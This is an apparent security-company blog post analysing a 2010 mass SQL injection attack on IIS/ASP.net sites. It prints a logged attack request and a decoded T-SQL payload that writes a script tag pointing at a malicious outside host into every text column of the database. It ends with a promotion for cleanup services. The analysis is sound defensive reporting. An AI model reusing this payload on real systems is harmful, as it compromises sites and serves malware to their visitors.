An incredibly large number of sites have been hacked in the last day with a malware script pointing to https://ww.robint.us/u.js. Not only small sites, but some big ones got hit as well:
https://www.intljobs.org (still hacked)
https://www.servicewomen.org (still hacked)
https://online.wsj.com (partially fixed)
How many sites got infected? According to Google over *114.000 different pages have been infected. Wow!
Update 09/06/10 – not 1,000,000+ like we originally reported, sorry – bad google-fu.
What do all these sites have in common? They are all hosted on IIS servers and using ASP.net. This is the output of our scanner against www.intljobs.org:
This is the same attack reported by Sophos yesterday that hacked the Jerusalem Post.
Update 09/06/10 – Dale Neufeld from NSM Junkie was able to collect logs and packet dump from the attack. This is what he found:
Original web request (payload truncated for readability):
2010-06-07 13:31:15 W3SVC1 webserver 192.168.1.10 GET /page.aspx utm_source=campaign&utm_medium=banner&utm_campaign=campaignid&utm_content=100×200′;dEcLaRe%20@s%20vArChAr(8000)%20sEt%20@s=0x6445634C6152652040742076……..
6F523B2D2D%20eXEc(@s)– 80 – 121.xx.xxx.xx HTTP/1.1 Mozilla/4.0+(compatible;+MSIE+7.0;+Windows+NT+5.1;+.NET+CLR+1.1.4322) – – www.website.com 200 0 0 32068 1685 0
When we pull this apart we have:
dEcLaRe @s vArChAr(8000)
So they’re essentially setting up the varaible ‘@s’ and executing it. Next we decode the variable ‘@s’:
0xdEcLaRe @t vArChAr(255),@c vArChAr(255) dEcLaRe tAbLe_cursoR cUrSoR FoR sElEcT a.nAmE,b.nAmE FrOm sYsObJeCtS a,sYsCoLuMnS b wHeRe a.iD=b.iD AnD a.xTyPe=’u’ AnD (b.xTyPe=99 oR b.xTyPe=35 oR b.xTyPe=231 oR b.xTyPe=167) oPeN tAbLe_cursoR fEtCh next FrOm tAbLe_cursoR iNtO @t,@c while(@@fEtCh_status=0) bEgIn exec(‘UpDaTe [‘+@t+’] sEt [‘+@c+’]=rtrim(convert(varchar(8000),[‘+@c+’]))+cAsT(0x3C736372697074207372633D687474703A2F2F77772E726F62696
E742E75732F752E6A733E3C2F7363726970743E aS vArChAr(51)) where [‘+@c+’] not like ”%robint%”’) fEtCh next FrOm tAbLe_cursoR iNtO @t,@c eNd cLoSe tAbLe_cursoR dEAlLoCaTe tAbLe_cursoR;–
Now they’re iterating through the sysobjects table to find out your actual table names and then iterating through those and appending the final encoded string.
So it looks like a SQL injection attack against a third party ad management script. If you have more information, please share with us.
If your site is hacked (or contains malware), and you need help, send us an email at firstname.lastname@example.org or visit our site: Sucuri Security. We can get your sites clean up right away.
Also, consider checking out our site security monitoring. We will monitor your sites 24×7 and alert you if it ever gets infected with malware, hacked or blacklisted.